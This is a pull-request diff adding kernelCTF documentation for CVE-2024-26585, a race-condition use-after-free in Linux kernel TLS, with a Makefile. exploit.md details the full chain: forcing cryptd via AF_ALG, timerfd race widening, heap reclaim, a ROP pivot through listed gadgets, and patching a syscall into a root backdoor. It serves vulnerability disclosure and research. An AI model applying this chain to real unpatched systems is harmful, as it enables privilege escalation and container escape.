Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
228 changes: 228 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26585_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,228 @@
## Setup

To trigger the TLS encryption we must first configure the socket.
This is done using the setsockopt() with SOL_TLS option:

```
static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
err(1, "TLS_TX");

```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.

As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption.
Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

Following code causes AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "skcipher",
.salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0)
err(1, "af_alg bind");
```


## Triggering use-after-free through race condition

```
if (!pending && ctx->async_notify)
complete(&ctx->async_wait.completion);
[1] spin_unlock_bh(&ctx->encrypt_compl_lock);

if (!ready)
return;

/* Schedule the transmission */
if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
[2] schedule_delayed_work(&ctx->tx_work.work, 1);
```

To exploit the race condition we have to hit window between lines [1] and [2] and perform following actions:
1. Close the socket to free tls context (struct tls_sw_context_tx)
2. Allocate our own object in place of the tls context (which is allocated from general kmalloc-192 cache).

To hit this small window and extend it enough to fit our allocations we turn to a well-known timerfd technique invented by Jann Horn.
The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows)
of epoll watches to this timerfd to make the time needed to handle the interrupt longer.
For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).


Exploitation is done in 2 threads - main process runs on CPU 0, and a new thread (child_send()) is cloned for each attempt and bound to CPU 1

| CPU 0 | CPU 1 |
| -------- | -------- |
| allocate tls context | - |
| - | exploit calls send() triggering async crypto ops |
| - | tls_sw_sendmsg() waits on completion |
| - | cryptd calls tls_encrypt_done() |
| - | tls_encryption_done() finishes complete() call |
| - | timer interrupts tls_encrypt_done() |
| send() returns to userspace unlocking the socket | timerfd code goes through all epoll notifications |
| exploit calls close() to free tls context | ... |
| exploit allocates key payload in place of tls context | ... |
| - | interrupt finishes and returns control to tls_encrypt_done() |
| - | schedule_delayed_work() is called on attacker-controlled data from ctx |


## Getting RIP control

Getting RIP control is trivial when we control the argument to schedule_delayed_work() (struct delayed_work is at offset 0x30 of our victim object tls_sw_context_tx).

```
struct tls_sw_context_tx {
struct crypto_aead * aead_send; /* 0 0x8 */
struct crypto_wait async_wait; /* 0x8 0x28 */
struct tx_work tx_work; /* 0x30 0x60 */
...
}

struct delayed_work {
struct work_struct work; /* 0 0x20 */
struct timer_list timer; /* 0x20 0x28 */
struct workqueue_struct * wq; /* 0x48 0x8 */
int cpu; /* 0x50 0x4 */
};

struct work_struct {
atomic_long_t data; /* 0 0x8 */
struct list_head entry; /* 0x8 0x10 */
work_func_t func; /* 0x18 0x8 */
};

struct timer_list {
struct hlist_node entry; /* 0 0x10 */
long unsigned int expires; /* 0x10 0x8 */
void (*function)(struct timer_list *); /* 0x18 0x8 */
u32 flags; /* 0x20 0x4 */
};



```

Setting timer.function to our desired RIP is all that is needed.

The important thing to note is that our code will be executed from the timer interrupt context.

## Pivot to ROP

When timer function is called we get control of following registers:
- RDI - pointer to struct timer_list (offset 0x20 from struct delayed_work and 0x50 from struct tls_sw_context_tx)
- R12 - copy of RDI

We control entire tls_sw_context_tx object except for first 0x18 bytes (because of the key payload header), but many offsets are unusable for purpose of storing ROP chain because corresponding struct fields have to be set to particular values for the timer to be scheduled or are modified by timer subsystem before timer function are triggered.

Five gadgets are used to pass control to ROP:

#### Gadget 1

```
lea rbp, [rdi - 0x80]
push rbx
mov rbx, rdi
mov rax, qword ptr [rdi + 0x68]
mov rdi, rbp
call __x86_indirect_thunk_rax
```

This substracts 0x80 from the location of our timer_list and assigns it to RDI and RBP registers.
This means our payload pointer is moved backwards, allowing us to use data preceding timer_list.
Without this, we would be limited to offset >= 0x50 of the total 0xc0 (kmalloc-192).

We actually moved too far back, but this will be fixed by next gadgets

#### Gadget 2

```
mov rax, qword ptr [r12 + 0x50]
mov rsi, rbp
mov rdi, r12
call __x86_indirect_thunk_rax
```

This copies moved backwards (offset -0x80) pointer to RSI and the original (offset 0) pointer to RDI.

#### Gadget 3

```
push rsi
jmp qword ptr [rbp + 0x48]
```

This pushes the moved backwards pointer to the stack.

#### Gadget 4

```
pop rsp
jmp qword [rsi + 0x66]
```

This copies the moved backwards pointer to the RSP register, but this pointer is too far backwards, so we need one more gadget.

#### Gadget 5

```
add rsp, 0x38
pop rbx
pop rbp
pop r12
jmp __x86_return_thunk
```

This add 0x50 to RSP (pointing it at the start of our ROP chain) and executes a retpoline to start ROP execution.


## Second pivot

At this point we have full ROP, but there our space is severely limited.
To have enough space to execute all privilege escalation code we have to pivot again.
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.

## Privilege escalation

As mentioned before, our ROP is executed from the interrupt context, so we can't do a traditional commit_creds() to modify the current process's privileges because the current process context is unknown.

We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel creating a backdoor that will grant root privileges to any process that executes a given syscall.

We chose a rarely used kexec_file_load() syscall and overwrote its code with our get_root function that does all traditional privileges escalation/namespace escape stuff: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy) etc.

This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.

Patching the kernel function is done rop_patch_kernel_code() - it calls set_memory_rw() on destination memory and uses copy_user_generic() to write new code there.

It would take a lot of effort to be able to properly return from the interrupt after all the pivots, so we just jump to an infinite loop gadget after patching is complete. This will make CPU 1 unusable, but we still have CPU 0 and from there can call kexec_file_load() to get root privileges.
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
### Privilege escalation by patching kernel code to introduce a backdoor

In cases where code execution is established, but there is no process context to escalate privileges (like interrupt handlers) the simple way is to overwrite kernel code installing a backdoor in one of the syscalls and that backdoor can be later called from any process to gain root privileges.
This is also useful when recovery is impossible and the kernel will hang/oops after installing the backdoor, rendering the process attempting exploitation useless. With this technique root shell can be executed from a completely separate process.

For more details see [exploit docs](exploit.md#privilege-escalation)
56 changes: 56 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26585_lts_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a42055e8d2c30d4decfc13ce943d09c7b9dad221

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb

## Affected kernel versions

Introduced in 4.20. Fixed in 6.1.83, 5.15.164 and other stable trees.

## Affected component, subsystem

net/tls

## Description

TLS encryption works by calling sendmsg() with plaintext as a message on a TLS configured socket.
AEAD encryption work is submitted to the crypto subsystem in tls_do_encryption(), setting tls_encrypt_done() as a callback and calling crypto_aead_encrypt().

If encryption is done asynchronously, crypto_aead_encrypt() returns immediately with EINPROGRESS value instead of waiting.
Execution then returns to tls_sw_sendmsg() which waits for the async crypto operations to be done using a completion mechanism.

When encryption is finished, the crypto subsystem calls tls_encrypt_done() callback function, which calls complete() allowing tls_sw_sendmsg() to exit. When sendmsg() returns, the socket is no longer locked and it is now possible to close it, which causes all associated objects to be freed.

Relevant tls_encrypt_done() code:

```
...

spin_lock_bh(&ctx->encrypt_compl_lock);
pending = atomic_dec_return(&ctx->encrypt_pending);

if (!pending && ctx->async_notify)
[1] complete(&ctx->async_wait.completion);
spin_unlock_bh(&ctx->encrypt_compl_lock);

if (!ready)
return;

/* Schedule the transmission */
if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
[2] schedule_delayed_work(&ctx->tx_work.work, 1);
}

```

The bug is a race condition - calling complete at [1] allows the socket to be closed, which causes the ctx object to be freed, but ctx is later used as an argument to schedule_delayed_work().

If attacker manages to close the socket and reallocate freed ctx with controlled data between points [1] and [2], he can easily get code execution - schedule_delayed_work() is scheduling a function specified in ctx->tx_work to be run after a delay.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.156.69.h
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading
Loading